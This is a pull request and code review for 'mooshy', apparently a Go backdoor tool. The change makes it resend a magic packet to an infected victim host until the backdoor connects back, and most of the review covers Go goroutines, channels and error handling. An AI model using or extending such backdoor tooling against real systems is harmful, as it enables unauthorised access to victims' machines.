### PR TITLE
Poll sending magic number

### LINKED ISSUE #39: Poll when trying connecting to a victim
When connecting to a supposedly infected host quickly after initiating infection (as happens for example in `example.sh`), it sometimes fails. This is probably because the infection is still in progress.
Resending the magic packet every few (possibly incrementing) seconds until the host responds might solve this problem.

### PR DESCRIPTION
**Pull request by b10n**
Closes #39

### CODE REVIEW

**Review by rvolosatovs — CHANGES_REQUESTED** [review]
https://blog.golang.org/share-memory-by-communicating

File: cmd/mooshy/mooshy.go [hunk 1]
```diff
@@ -421,15 +444,13 @@ func main() {
 			log.Fatalf("Failed to parse port from %s: %s", l.Addr(), err)
 		}
 
-		_, err = conn.Write([]byte(mooshy.MagicNumber + port))
-		if err != nil {
-			log.Fatalf("Failed to send magic number to %s: %s", *addr, err)
-		}
-
+		connected := false
+		go pollMagicNumber(conn, port, *addr, &connected)
```
[the remark this answers is not in the document]
Comment (b10n) [reply cmd/mooshy/mooshy.go]: Thanks for the tip. I was already thinking that there would be a more refined method than simply pointing to shared memory.

File: cmd/mooshy/mooshy.go [hunk 2]
```diff
@@ -174,6 +174,31 @@ func latestMoosh(token string) (string, error) {
 	return "", errors.New("not found")
 }
 
+func pollMagicNumber(conn net.Conn, port string, addr string, connected chan struct{}) {
```
Comment (rvolosatovs) [inline cmd/mooshy/mooshy.go]: Wouldn't it be nicer to drop the 5 retry constraints and have this function send the magic number every `interval time.Duration` until a read from `connected` succeeds?

File: cmd/mooshy/mooshy.go [hunk 3]
```diff
@@ -174,6 +174,31 @@ func latestMoosh(token string) (string, error) {
...
+		time.Sleep(timeout)
+		timeout *= 2
+
+		select {
+		case <-connected:
+			return
+		default:
+		}
+	}
+	log.Fatalf("Did not receive a connection after %d tries", i)
```
Comment (rvolosatovs) [inline cmd/mooshy/mooshy.go]: Maybe return an error and let the caller decide if it should `exit` or a recovery is possible?

File: cmd/mooshy/mooshy.go (hunk 2 above)
Comment (rvolosatovs) [reply cmd/mooshy/mooshy.go]: Also, this function is only used once in the code, so there is no need to promote it to a function.

Comment (b10n) [reply cmd/mooshy/mooshy.go]: The rationale behind the 5 tries is that it does not block the execution of the `example.sh` script (or any other dependency for that matter) should a delivery fail, while still giving the backdoor a fair amount of time to deploy (~30 seconds).
IMHO using a function is clearer as per the functional decomposition paradigm, but feel free to refactor it.

File: cmd/mooshy/mooshy.go (hunk 3 above)
Comment (b10n) [reply cmd/mooshy/mooshy.go]: Agreed. I changed the function to return an error instead.

Comment (b10n) [reply cmd/mooshy/mooshy.go]: What's the best way to catch errors from a goroutine?

Comment (rvolosatovs) [reply cmd/mooshy/mooshy.go]: Don't know if it's the best, but in general one of the ways would be:
```go
errch := make(chan error, 1)
go func() {
   errch <- fn()
}
<-errch // once this succeeds, the fn has returned
```

Here I guess you can still do the `log.Fatal`, but then inside a 
```go
go func() {
   if err := fn(); err != nil {
       log.Fatalf("Failed to...: %s", err)
   }
}
```

Keep in mind, that none of the `defer`ed statements execute after the `log.Fatal`.

File: cmd/mooshy/mooshy.go [hunk 4]
```diff
@@ -174,31 +174,6 @@ func latestMoosh(token string) (string, error) {
 	return "", errors.New("not found")
 }
 
-func pollMagicNumber(conn net.Conn, port string, addr string, connected chan struct{}) error {
```
Comment (b10n) [inline cmd/mooshy/mooshy.go]: Shouldn't the function `runShell` (and `NewSSHRunner` if it's not intentionally exported) than also be included in its/their calling function (i.e. `main`)? Both are only called once in the code.

File: cmd/mooshy/mooshy.go [hunk 5]
```diff
@@ -447,7 +447,8 @@ func main() {
 			ch <- conn
 		}()
 
-		for timeout := time.Second; ; timeout *= 2 {
+		deadline := time.Now().Add(20 * time.Second)
+		for timeout := time.Second; time.Now().Before(deadline); timeout *= 2 {
```
Comment (b10n) [inline cmd/mooshy/mooshy.go]: Reaching the `deadline` does not interrupt `time.Sleep(timeout)`.

**Review by rvolosatovs — APPROVED** [review]

File: cmd/mooshy/mooshy.go (hunk 4 above)
Comment (rvolosatovs) [reply cmd/mooshy/mooshy.go]: Yes. We need to be careful with the `defer` statements though.
They do not execute after a `log.Fatal` at all.
One way around this would be extracting most of the `main` contents into a separate function, which returns an error.

Comment (b10n) [reply cmd/mooshy/mooshy.go]: Okay. I think that would be something for a separate issue/PR.

File: cmd/mooshy/mooshy.go [hunk 6]
```diff
@@ -405,50 +406,75 @@ func main() {
...
+		go func() {
+			conn, err := l.Accept()
+			if err != nil {
+				log.Fatalf("Failed to accept connection on %s: %s", l.Addr(), err)
+			}
+			log.Printf("Received connection from %s", conn.RemoteAddr())
+			ch <- conn
+		}()
+
+		deadlineTime := time.After(time.Duration(*deadline) * time.Second)
```
Comment (rvolosatovs) [inline cmd/mooshy/mooshy.go]: This is quite confusing, as this value is not a `time.Time`, but a `chan` - something like `deadlineCh` could fit this better.

**Review by rvolosatovs — APPROVED** [review]

File: cmd/mooshy/mooshy.go (hunk 6 above)
Comment (b10n) [reply cmd/mooshy/mooshy.go]: Ah, I didn't notice that.
